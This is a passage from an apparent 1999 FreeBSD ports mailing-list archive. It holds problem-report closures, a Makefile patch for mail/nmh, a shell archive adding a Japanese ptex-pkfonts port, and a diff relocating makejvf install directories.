23 Dec 1999 08:29:06 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:29:06 -0800 (PST) From: Message-Id: <199912231629.IAA91527@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15242: Update port: japanese/grep Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: japanese/grep State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:23:30 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:30:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B6A7C156C2 for ; Thu, 23 Dec 1999 08:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA91641; Thu, 23 Dec 1999 08:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from sabmail.rresearch.com (ip18.gte13.rb1.bel.nwlink.com [207.202.150.18]) by hub.freebsd.org (Postfix) with ESMTP id B809F15699 for ; Thu, 23 Dec 1999 08:24:49 -0800 (PST) (envelope-from scott@sabunix.rresearch.com) Received: (from scott@localhost) by sabmail.rresearch.com (8.9.3/8.9.3) id IAA16476; Thu, 23 Dec 1999 08:24:47 -0800 (PST) (envelope-from scott) Message-Id: <199912231624.IAA16476@sabmail.rresearch.com> Date: Thu, 23 Dec 1999 08:24:47 -0800 (PST) From: Scott Blachowicz Reply-To: scott@sabunix.rresearch.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15648: mail/nmh: minor tweak to recently submitted Makefile Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15648 >Category: ports >Synopsis: get rid of unneeded 'post-patch' in mail/nmh Makefile >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 08:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Scott Blachowicz >Release: FreeBSD 3.2-RELEASE i386 >Organization: none >Environment: FreeBSD & mail/nmh port for nmh-1.0.2 >Description: Most recent port update uses USE_AUTOCONF, so the post-patch rule to avoid accidental running of autoconf/autoheader after patching autoconf input AND output files is no longer necessary (since only autoconf input files are patched). >How-To-Repeat: >Fix: Apply following patch to port: --- ../nmh-curr/Makefile Thu Dec 23 02:13:51 1999 +++ ./Makefile Thu Dec 23 08:06:37 1999 @@ -66,11 +66,6 @@ pre-configure: cd ${WRKSRC}; chmod +w configure -# Since we patch the autoconf files as well as their outputs, avoid attempt -# to regenerate header input files with 'autoheader' by Makefile. -post-patch: - @${TOUCH} ${WRKSRC}/stamp-h.in - post-install: @PKG_PREFIX='${PREFIX}' sh ${PKGDIR}/INSTALL chgrp mail ${PREFIX}/bin/inc >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:31: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2268114D2D; Thu, 23 Dec 1999 08:30:45 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA91819; Thu, 23 Dec 1999 08:30:45 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:30:45 -0800 (PST) From: Message-Id: <199912231630.IAA91819@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15244: Update port: japanese/gxditview Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: japanese/gxditview State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:30:03 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:34: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 61C421570C; Thu, 23 Dec 1999 08:33:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA92129; Thu, 23 Dec 1999 08:33:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:33:25 -0800 (PST) From: Message-Id: <199912231633.IAA92129@freefall.freebsd.org> To: ak03@gte.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15250: MC fail to show contents of ZIP archives Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: MC fail to show contents of ZIP archives State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:31:18 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:35: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 986F8158E0; Thu, 23 Dec 1999 08:34:48 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA92382; Thu, 23 Dec 1999 08:34:48 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:34:48 -0800 (PST) From: Message-Id: <199912231634.IAA92382@freefall.freebsd.org> To: kbyanc@posi.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15253: update nqc port to 2.0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update nqc port to 2.0.2 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:33:55 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:36:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 401F3159CD; Thu, 23 Dec 1999 08:36:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA92720; Thu, 23 Dec 1999 08:36:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:36:41 -0800 (PST) From: Message-Id: <199912231636.IAA92720@freefall.freebsd.org> To: saken@hotel.rmta.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15266: UPDATE: ports/www/tidy to Nov 30 version Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: UPDATE: ports/www/tidy to Nov 30 version State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:35:47 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:45:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A67851582A; Thu, 23 Dec 1999 08:45:48 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA93639; Thu, 23 Dec 1999 08:45:48 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 08:45:48 -0800 (PST) From: Message-Id: <199912231645.IAA93639@freefall.freebsd.org> To: tkato@prontomail.ne.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15402: Update port: games/xshisen Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: games/xshisen State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 08:43:16 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 9: 9:42 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A969614F4E; Thu, 23 Dec 1999 09:08:37 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA95961; Thu, 23 Dec 1999 09:08:37 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 09:08:37 -0800 (PST) From: Message-Id: <199912231708.JAA95961@freefall.freebsd.org> To: jack@germanium.xtalwind.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15295: Update port: rrdtool from version 1.0.7 to 1.0.8 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: rrdtool from version 1.0.7 to 1.0.8 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 09:07:15 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 9:10:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3F61514FFA for ; Thu, 23 Dec 1999 09:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA96128; Thu, 23 Dec 1999 09:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from serio.al.rim.or.jp (serio.al.rim.or.jp [202.247.191.251]) by hub.freebsd.org (Postfix) with ESMTP id 449C8157C5 for ; Thu, 23 Dec 1999 09:00:26 -0800 (PST) (envelope-from inagaki@tg.rim.or.jp) Received: from mail-relay.rim.or.jp by serio.al.rim.or.jp (8.8.8/3.7W/HMX-12) with ESMTP id CAA22981 for ; Fri, 24 Dec 1999 02:00:25 +0900 (JST) Received: from lunatic.kareidoscope.ne.jp (cs2d326.ppp.infoweb.ne.jp [202.219.174.234]) by mail-relay.rim.or.jp (3.7W/HMX-12) id CAA08375 for ; Fri, 24 Dec 1999 02:00:23 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by lunatic.kareidoscope.ne.jp (8.9.3/3.7W) with ESMTP id BAA24442 for ; Fri, 24 Dec 1999 01:59:02 +0900 (JST) Message-Id: <19991224015757Q.inagaki@tg.rim.or.jp> Date: Fri, 24 Dec 1999 01:57:57 +0900 From: Kentaro Inagaki / =?iso-2022-jp?B?GyRCMHAzQBsoQiAbJEI3ckJATzobKEI=?= To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15650: new port: ptex-pkfont Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15650 >Category: ports >Synopsis: new port: ptex-pkfont >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 09:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Inagaki Kentaro & >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: This makes symlink to English PK fonts package for ghostscripts, xdvik, dvipsk and so on This package depends on one of print/pkfont*. >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # ptex-pkfonts118 # ptex-pkfonts118/Makefile # ptex-pkfonts240 # ptex-pkfonts240/Makefile # ptex-pkfonts300 # ptex-pkfonts300/pkg # ptex-pkfonts300/pkg/PLIST # ptex-pkfonts300/pkg/COMMENT # ptex-pkfonts300/pkg/DESCR # ptex-pkfonts300/files # ptex-pkfonts300/files/REQ.tmpl # ptex-pkfonts300/Makefile # ptex-pkfonts360 # ptex-pkfonts360/Makefile # ptex-pkfonts400 # ptex-pkfonts400/Makefile # ptex-pkfonts600 # ptex-pkfonts600/Makefile # echo c - ptex-pkfonts118 mkdir -p ptex-pkfonts118 > /dev/null 2>&1 echo x - ptex-pkfonts118/Makefile sed 's/^X//' >ptex-pkfonts118/Makefile << 'END-of-ptex-pkfonts118/Makefile' X# New ports collection makefile for: ptex-pkfonts X# Version required: ? X# Date created: 24 Dec 1999 X# Whom: Kentaro Inagaki X# X# $FreeBSD$ X# X XRESOLUTION= 118 XMASTERDIR= ${.CURDIR}/../ptex-pkfonts118 X X.include "${MASTERDIR}/Makefile" END-of-ptex-pkfonts118/Makefile echo c - ptex-pkfonts240 mkdir -p ptex-pkfonts240 > /dev/null 2>&1 echo x - ptex-pkfonts240/Makefile sed 's/^X//' >ptex-pkfonts240/Makefile << 'END-of-ptex-pkfonts240/Makefile' X# New ports collection makefile for: ptex-pkfonts X# Version required: ? X# Date created: 24 Dec 1999 X# Whom: Kentaro Inagaki X# X# $FreeBSD$ X# X XRESOLUTION= 240 XMASTERDIR= ${.CURDIR}/../ptex-pkfonts240 X X.include "${MASTERDIR}/Makefile" END-of-ptex-pkfonts240/Makefile echo c - ptex-pkfonts300 mkdir -p ptex-pkfonts300 > /dev/null 2>&1 echo c - ptex-pkfonts300/pkg mkdir -p ptex-pkfonts300/pkg > /dev/null 2>&1 echo x - ptex-pkfonts300/pkg/PLIST sed 's/^X//' >ptex-pkfonts300/pkg/PLIST << 'END-of-ptex-pkfonts300/pkg/PLIST' END-of-ptex-pkfonts300/pkg/PLIST echo x - ptex-pkfonts300/pkg/COMMENT sed 's/^X//' >ptex-pkfonts300/pkg/COMMENT << 'END-of-ptex-pkfonts300/pkg/COMMENT' XEnglish PK fonts, for ghostscripts, xdvik, dvipsk and so on END-of-ptex-pkfonts300/pkg/COMMENT echo x - ptex-pkfonts300/pkg/DESCR sed 's/^X//' >ptex-pkfonts300/pkg/DESCR << 'END-of-ptex-pkfonts300/pkg/DESCR' XThis makes symlink to English PK fonts package. X XThis package depends on one of print/pkfont*. END-of-ptex-pkfonts300/pkg/DESCR echo c - ptex-pkfonts300/files mkdir -p ptex-pkfonts300/files > /dev/null 2>&1 echo x - ptex-pkfonts300/files/REQ.tmpl sed 's/^X//' >ptex-pkfonts300/files/REQ.tmpl << 'END-of-ptex-pkfonts300/files/REQ.tmpl' X#!/bin/sh X Xif [ "x$1" = "x" ]; then X exit 1; Xfi X Xif [ "x$2" = "xINSTALL" ]; then X mkdir -p ${PKG_PREFIX}/share/texmf/fonts/pk/%%USEPK_MODE%% X ln -sf ${PKG_PREFIX}/lib/fonts/pk%%RESOLUTION%% ${PKG_PREFIX}/share/texmf/fonts/pk/%%USEPK_MODE%%/ Xfi X Xif [ "x$2" = "xDEINSTALL" ]; then X rm ${PKG_PREFIX}/share/texmf/fonts/pk/%%USEPK_MODE%%/pk%%RESOLUTION%% Xfi END-of-ptex-pkfonts300/files/REQ.tmpl echo x - ptex-pkfonts300/Makefile sed 's/^X//' >ptex-pkfonts300/Makefile << 'END-of-ptex-pkfonts300/Makefile' X# New ports collection makefile for: ptex-pkfonts X# Version required: ? X# Date created: 24 Dec 1999 X# Whom: Kentaro Inagaki X# X# $FreeBSD$ X# X XDISTNAME= ptex-pkfonts XPKGNAME?= ja-ptex-pkfonts${RESOLUTION}-1.0 XCATEGORIES= japanese print XDISTFILES= #null X XMAINTAINER= inagaki@tg.rim.or.jp X XRUN_DEPENDS= ${LOCALBASE}/lib/fonts/pk${RESOLUTION}:${PORTSDIR}/print/pkfonts${RESOLUTION} X XNO_BUILD= yes XPKGREQ= ${WRKDIR}/REQ X X# ****************** X# USEPK_MODE: X# Mode name of Metafont to give to print/pkfonts* is set. X# It is care-and-attention to the other program how MetaFont wants to X# be executed that do not use modeless. Kpathsea always searches X# modeless because even if you specify any kind of mode. X# MAKETEX_MODE: X# It is mode name of default at executing MetaFont. The default is ljfour. X# This needs not to be changed. It can be changed with an option or resource. X# ****************** XUSEPK_MODE?= preview XMAKETEX_MODE?= ${USEPK_MODE} XRESOLUTION?= 300 X X.BEGIN: X.if defined(RESOLUTION) && \ X ${RESOLUTION} != 118 && ${RESOLUTION} != 240 && \ X ${RESOLUTION} != 300 && ${RESOLUTION} != 360 && \ X ${RESOLUTION} != 400 && ${RESOLUTION} != 600 X @${ECHO} "Error: invalid value for RESOLUTION: \"${RESOLUTION}\"" X @${ECHO} "Possible values are: 118, 240, 300, 360, 400 and 600." X @${FALSE} X.endif X Xdo-extract: X @${MKDIR} ${WRKDIR} X @${SED} -e 's,%%RESOLUTION%%,${RESOLUTION},g' \ X -e 's,%%USEPK_MODE%%,${USEPK_MODE},g' \ X < ${FILESDIR}/REQ.tmpl > ${WRKDIR}/REQ; \ X Xdo-install: X @${SETENV} PKG_PREFIX=${PREFIX} \ X ${SH} ${WRKDIR}/REQ ${PKGNAME} INSTALL X X.include END-of-ptex-pkfonts300/Makefile echo c - ptex-pkfonts360 mkdir -p ptex-pkfonts360 > /dev/null 2>&1 echo x - ptex-pkfonts360/Makefile sed 's/^X//' >ptex-pkfonts360/Makefile << 'END-of-ptex-pkfonts360/Makefile' X# New ports collection makefile for: ptex-pkfonts X# Version required: ? X# Date created: 24 Dec 1999 X# Whom: Kentaro Inagaki X# X# $FreeBSD$ X# X XRESOLUTION= 360 XMASTERDIR= ${.CURDIR}/../ptex-pkfonts300 X X.include "${MASTERDIR}/Makefile" END-of-ptex-pkfonts360/Makefile echo c - ptex-pkfonts400 mkdir -p ptex-pkfonts400 > /dev/null 2>&1 echo x - ptex-pkfonts400/Makefile sed 's/^X//' >ptex-pkfonts400/Makefile << 'END-of-ptex-pkfonts400/Makefile' X# New ports collection makefile for: ptex-pkfonts X# Version required: ? X# Date created: 24 Dec 1999 X# Whom: Kentaro Inagaki X# X# $FreeBSD$ X# X XRESOLUTION= 400 XMASTERDIR= ${.CURDIR}/../ptex-pkfonts400 X X.include "${MASTERDIR}/Makefile" END-of-ptex-pkfonts400/Makefile echo c - ptex-pkfonts600 mkdir -p ptex-pkfonts600 > /dev/null 2>&1 echo x - ptex-pkfonts600/Makefile sed 's/^X//' >ptex-pkfonts600/Makefile << 'END-of-ptex-pkfonts600/Makefile' X# New ports collection makefile for: ptex-pkfonts X# Version required: ? X# Date created: 24 Dec 1999 X# Whom: Kentaro Inagaki X# X# $FreeBSD$ X# X XRESOLUTION= 600 XMASTERDIR= ${.CURDIR}/../ptex-pkfonts600 X X.include "${MASTERDIR}/Makefile" END-of-ptex-pkfonts600/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 9:14: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 52FC115815; Thu, 23 Dec 1999 09:13:59 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA96514; Thu, 23 Dec 1999 09:13:58 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 09:13:58 -0800 (PST) From: Message-Id: <199912231713.JAA96514@freefall.freebsd.org> To: tkato@prontomail.ne.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15468: Update port: math/blas Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: math/blas State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 09:11:30 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 9:20:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8B68615410 for ; Thu, 23 Dec 1999 09:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA97136; Thu, 23 Dec 1999 09:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from serio.al.rim.or.jp (serio.al.rim.or.jp [202.247.191.251]) by hub.freebsd.org (Postfix) with ESMTP id BFE0714F1B for ; Thu, 23 Dec 1999 09:12:48 -0800 (PST) (envelope-from inagaki@tg.rim.or.jp) Received: from mail-relay.rim.or.jp by serio.al.rim.or.jp (8.8.8/3.7W/HMX-12) with ESMTP id CAA23645 for ; Fri, 24 Dec 1999 02:12:48 +0900 (JST) Received: from lunatic.kareidoscope.ne.jp (skai0731.ppp.infoweb.ne.jp [202.248.10.239]) by mail-relay.rim.or.jp (3.7W/HMX-12) id CAA09895 for ; Fri, 24 Dec 1999 02:12:45 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by lunatic.kareidoscope.ne.jp (8.9.3/3.7W) with ESMTP id CAA24674 for ; Fri, 24 Dec 1999 02:11:23 +0900 (JST) Message-Id: <19991224021123R.inagaki@tg.rim.or.jp> Date: Fri, 24 Dec 1999 02:11:23 +0900 From: Kentaro Inagaki / =?iso-2022-jp?B?GyRCMHAzQBsoQiAbJEI3ckJATzobKEI=?= To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15651: update: makejvf Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15651 >Category: ports >Synopsis: update: makejvf >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 09:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Inagaki Kentaro & >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: A install directory is changed. >How-To-Repeat: >Fix: Only in /usr/ports/japanese/makejvf: CVS diff -ru /usr/ports/japanese/makejvf/Makefile makejvf/Makefile --- /usr/ports/japanese/makejvf/Makefile Thu Nov 18 08:38:45 1999 +++ makejvf/Makefile Fri Dec 24 02:05:52 1999 @@ -23,39 +23,44 @@ DIST_SUBDIR= makejvf INSTALL_TARGET= install-all BINARIES= makejvf makejvfh makejvfk -MAKEJVFDIR= ${PREFIX}/share/fonts/makejvf -PTEXTFM= standard nmin-ngoth jis morisawa +TEXMF= ${PREFIX}/share/texmf +MAKEJVF_DIR= ${PREFIX}/share/fonts/makejvf +MAP_DIR= ${TEXMF}/dvips/makejvf +PTEX_TFM_DIR= ${TEXMF}/fonts/tfm/makejvf +DVIPS_TFM_DIR= ${TEXMF}/fonts/tfm/makejvf +DVIPS_VF_DIR= ${TEXMF}/fonts/vf/makejvf +PTEX_TFM= standard nmin-ngoth jis morisawa -DOCS= README.1st README.txt test1.tex test2.tex kuten2jis jy1mch.fd +DOCS= README.1st README.txt test1.tex test2.tex kuten2jis jy1mch.fd post-extract: - @for i in ${PTEXTFM} ; do \ + @for i in ${PTEX_TFM} ; do \ ${TAR} -C ${WRKDIR}/ -zxf ${DISTDIR}/${DIST_SUBDIR}/$$i${EXTRACT_SUFX} ; \ done post-install: - @${MKDIR} ${MAKEJVFDIR} - @for i in ${PTEXTFM} ; do \ + @${MKDIR} ${MAP_DIR} + @for i in ${PTEX_TFM} ; do \ ${INSTALL_DATA} ${WRKDIR}/$$i/$$i.map \ - ${MAKEJVFDIR}/ ; \ + ${MAP_DIR}/ ; \ done - @${MKDIR} ${MAKEJVFDIR}/tfm/ptex - @for i in ${PTEXTFM} ; do \ + @${MKDIR} ${PTEX_TFM_DIR}/ptex + @for i in ${PTEX_TFM} ; do \ ${INSTALL_DATA} ${WRKDIR}/$$i/tfm/ptex/* \ - ${MAKEJVFDIR}/tfm/ptex/ ; \ + ${PTEX_TFM_DIR}/ptex/ ; \ done - @${MKDIR} ${MAKEJVFDIR}/tfm/dvips - @for i in ${PTEXTFM} ; do \ + @${MKDIR} ${DVIPS_TFM_DIR}/dvips + @for i in ${PTEX_TFM} ; do \ ${INSTALL_DATA} ${WRKDIR}/$$i/tfm/dvips/* \ - ${MAKEJVFDIR}/tfm/dvips/ ; \ + ${DVIPS_TFM_DIR}/dvips/ ; \ done - @${MKDIR} ${MAKEJVFDIR}/vf - @for i in ${PTEXTFM} ; do \ + @${MKDIR} ${DVIPS_VF_DIR} + @for i in ${PTEX_TFM} ; do \ ${INSTALL_DATA} ${WRKDIR}/$$i/vf/* \ - ${MAKEJVFDIR}/vf/ ; \ + ${DVIPS_VF_DIR}/ ; \ done .if !defined(NOPORTDOCS) Only in makejvf: Makefile~ Only in /usr/ports/japanese/makejvf/files: CVS Only in /usr/ports/japanese/makejvf/patches: CVS Only in /usr/ports/japanese/makejvf/pkg: CVS diff -ru /usr/ports/japanese/makejvf/pkg/PLIST makejvf/pkg/PLIST --- /usr/ports/japanese/makejvf/pkg/PLIST Thu Nov 18 08:38:45 1999 +++ makejvf/pkg/PLIST Sun Nov 21 02:17:41 1999 @@ -7,133 +7,132 @@ share/doc/makejvf-fkr/test2.tex share/doc/makejvf-fkr/kuten2jis share/doc/makejvf-fkr/jy1mch.fd -share/fonts/makejvf/standard.map -share/fonts/makejvf/nmin-ngoth.map -share/fonts/makejvf/jis.map -share/fonts/makejvf/morisawa.map -share/fonts/makejvf/tfm/ptex/goth10.tfm -share/fonts/makejvf/tfm/ptex/goth5.tfm -share/fonts/makejvf/tfm/ptex/goth6.tfm -share/fonts/makejvf/tfm/ptex/goth7.tfm -share/fonts/makejvf/tfm/ptex/goth8.tfm -share/fonts/makejvf/tfm/ptex/goth9.tfm -share/fonts/makejvf/tfm/ptex/min10.tfm -share/fonts/makejvf/tfm/ptex/min5.tfm -share/fonts/makejvf/tfm/ptex/min6.tfm -share/fonts/makejvf/tfm/ptex/min7.tfm -share/fonts/makejvf/tfm/ptex/min8.tfm -share/fonts/makejvf/tfm/ptex/min9.tfm -share/fonts/makejvf/tfm/ptex/tgoth10.tfm -share/fonts/makejvf/tfm/ptex/tgoth5.tfm -share/fonts/makejvf/tfm/ptex/tgoth6.tfm -share/fonts/makejvf/tfm/ptex/tgoth7.tfm -share/fonts/makejvf/tfm/ptex/tgoth8.tfm -share/fonts/makejvf/tfm/ptex/tgoth9.tfm -share/fonts/makejvf/tfm/ptex/tmin10.tfm -share/fonts/makejvf/tfm/ptex/tmin5.tfm -share/fonts/makejvf/tfm/ptex/tmin6.tfm -share/fonts/makejvf/tfm/ptex/tmin7.tfm -share/fonts/makejvf/tfm/ptex/tmin8.tfm -share/fonts/makejvf/tfm/ptex/tmin9.tfm -share/fonts/makejvf/tfm/ptex/ngoth10.tfm -share/fonts/makejvf/tfm/ptex/ngoth5.tfm -share/fonts/makejvf/tfm/ptex/ngoth6.tfm -share/fonts/makejvf/tfm/ptex/ngoth7.tfm -share/fonts/makejvf/tfm/ptex/ngoth8.tfm -share/fonts/makejvf/tfm/ptex/ngoth9.tfm -share/fonts/makejvf/tfm/ptex/nmin10.tfm -share/fonts/makejvf/tfm/ptex/nmin5.tfm -share/fonts/makejvf/tfm/ptex/nmin6.tfm -share/fonts/makejvf/tfm/ptex/nmin7.tfm -share/fonts/makejvf/tfm/ptex/nmin8.tfm -share/fonts/makejvf/tfm/ptex/nmin9.tfm -share/fonts/makejvf/tfm/ptex/jis.tfm -share/fonts/makejvf/tfm/ptex/jisg.tfm -share/fonts/makejvf/tfm/ptex/FutoGoB101-Bold-H.tfm -share/fonts/makejvf/tfm/ptex/FutoGoB101-Bold-J.tfm -share/fonts/makejvf/tfm/ptex/FutoGoB101-Bold-V.tfm -share/fonts/makejvf/tfm/ptex/FutoMinA101-Bold-H.tfm -share/fonts/makejvf/tfm/ptex/FutoMinA101-Bold-J.tfm -share/fonts/makejvf/tfm/ptex/FutoMinA101-Bold-V.tfm -share/fonts/makejvf/tfm/ptex/GothicBBB-Medium-H.tfm -share/fonts/makejvf/tfm/ptex/GothicBBB-Medium-J.tfm -share/fonts/makejvf/tfm/ptex/GothicBBB-Medium-V.tfm -share/fonts/makejvf/tfm/ptex/Jun101-Light-H.tfm -share/fonts/makejvf/tfm/ptex/Jun101-Light-J.tfm -share/fonts/makejvf/tfm/ptex/Jun101-Light-V.tfm -share/fonts/makejvf/tfm/ptex/Ryumin-Light-H.tfm 